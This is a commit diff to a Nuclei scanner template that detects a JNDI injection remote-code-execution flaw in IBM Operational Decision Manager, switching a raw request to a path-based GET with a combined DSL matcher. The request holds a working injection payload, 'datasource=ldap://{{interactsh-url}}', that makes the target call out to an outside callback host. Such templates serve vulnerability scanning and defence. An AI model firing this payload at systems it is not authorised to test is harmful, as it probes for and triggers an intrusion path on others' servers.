req type and matcher update
Ritik Chaddha
GitHub
parent
f6e683d7e5
commit
3c9e393d50
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: DhiyaneshDK
|
author: DhiyaneshDK
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145."
|
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
|
|
@ -24,24 +24,15 @@ info:
|
||||||
tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce
|
tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- method: GET
|
||||||
- |
|
path:
|
||||||
GET /decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}} HTTP/1.1
|
- "{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"
|
||||||
Host: {{Hostname}}
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: dsl
|
||||||
part: interactsh_protocol
|
dsl:
|
||||||
words:
|
- contains(interactsh_protocol, "dns")
|
||||||
- "dns"
|
- 'contains(header, "application/json")'
|
||||||
|
- 'contains(body, "patchLevel\":")'
|
||||||
- type: word
|
- 'status_code == 200'
|
||||||
part: body
|
condition: and
|
||||||
words:
|
|
||||||
- '"patchLevel":'
|
|
||||||
|
|
||||||
- type: word
|
|
||||||
part: header
|
|
||||||
words:
|
|
||||||
- 'application/json'
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue